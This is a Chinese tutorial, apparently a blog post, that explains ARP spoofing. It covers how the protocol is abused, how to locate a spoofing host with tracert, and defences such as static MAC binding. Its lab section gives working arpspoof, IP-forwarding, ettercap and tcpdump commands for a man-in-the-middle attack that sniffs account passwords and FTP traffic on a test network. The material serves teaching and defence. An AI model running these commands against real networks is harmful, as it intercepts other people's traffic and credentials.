ARP欺骗
ARP 欺骗分双向欺骗和单向欺骗。
一、ARP通讯协议过程
由于局域网的网络流通不是根据IP地址进行,而是按照MAC地址进行传输、计算机是根据mac来识别一台机器。
区域网内A要向主机B发送报文,会查询本地的ARP缓存表,找到B的IP地址对应的MAC地址后,就会进行数据传输。如果未找到,则A广播一个ARP请求报文(携带主机B的IP地址),网上所有主机包括B都收到ARP请求,但只有主机B识别自己的IP地址,于是向A主机发回一个ARP响应报文。其中就包含有B的MAC地址,A接收到B的应答后,就会更新本地的ARP缓存。接着使用这个MAC地址发送数据(由网卡附加MAC地址)。
在网络监听过程中, 攻击者抢先合法主机B应答主机A发起的ARP请求;主机A被误导建立一个错误的映射并保存一段时间, 在这段时间内, 主机A发送给主机B的信息被误导致攻击者。 如果攻击者持续抢先应答ARP请求, 数据流就可能被一直误导下去。 如果攻击者模拟网络出口路由器发动ARP攻击, 内部网络的所有出口信息都将被接管。 如果攻击者将出口路由器IP和一个不存在的MAC地址进行映射, 即可以导致发送方受到拒绝服务的攻击。
二、找到ARP欺骗主机
使用tracert命令在任意一台受影响的主机上,在DOS命令窗口下运行如下命令:tracert61.135.179.148。假定设置的缺省网关为10.8.6.1,在跟踪一个外网地址时,第一跳却是10.8.6.186,那么,10.8.6.186就是病毒源。原理:中毒主机在受影响主机和网关之间,扮演了“中间人”的角色。所有本应该到达网关的数据包,由于错误的MAC地址,均被发到了中毒主机。此时,中毒主机越俎代庖,起了缺省网关的作用。
三、防护
做双绑定, 本地跟路由都做了绑定(注:mac地址绑定)
实战:
Kali(黑客A):192.168.137.100Windows(目标B);192.168.137.99
1.配置网络:仅主机模式,内外网,虚拟机间全部互通。
2.Windows:arp -a(主机B查看自己的arp缓存)
3.kali:fping -g 192.168.137.0/24(查看该网段存活的主机,fping -h查看帮助)
arpspoof -h查看帮助
arpspoof -i 网卡 -t 目标IP 网关
Arpspoof注入攻击欺骗目标主机:
A的mac地址 B的mac地址 主机B发送给网关的数据都发送到主机A上了。
此时目标断网,会产生警觉,所以执行之前先开启开启路由转发功能。下面演示:
4.linux因为系统安全考虑,是不支持IP转发的,其配置文件写在/proc/sys/net/ipv4的ip_forward中。默认为0,接下来修改为1。
5.Arpspoof注入攻击欺骗网关:arpspoof -i eth0 -t 192.168.137.1 192.168.137.99
该攻击成功后,网关192.168.137.1发给目标系统192.168.137.99上的信息发送到攻击者主机192.168.6.100上。
6.在终端中输入arpspoof -i eth0 -t 192.168.137.99 192.168.137.1,启动Arpspoof注入攻击目标系统,使主机192.168.137.99给网关 192.168.137.1发送的数据发到自己(A)。
并新开终端输入ettercap -Tp -i eth0进行账号密码嗅探;也可以将嗅探的数据保存到一个文件,方便查找自己需要的信息:ettercap -Tp -i eth0 >>111.txt。
(我们还可以使用driftnet截获受害者浏览的图片;也可以使用tcpdump或Wireshark工具截获所有流量。)
7.使用工具tcpdump监听ftp的21端口并将所截获数据包导入到111.txt中(如没有111.txt,则自动新建)
tcpdump -nn -X -i eth0 tcp prot 21 > 111.txt
8.怎样防范ARP欺骗
1.在主机绑定网关MAC与IP地址为静态(默认为动态),命令:arp -s 网关IP 网关MAC
2.在网关绑定主机MAC与IP地址
3.使用ARP防火墙
4926
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
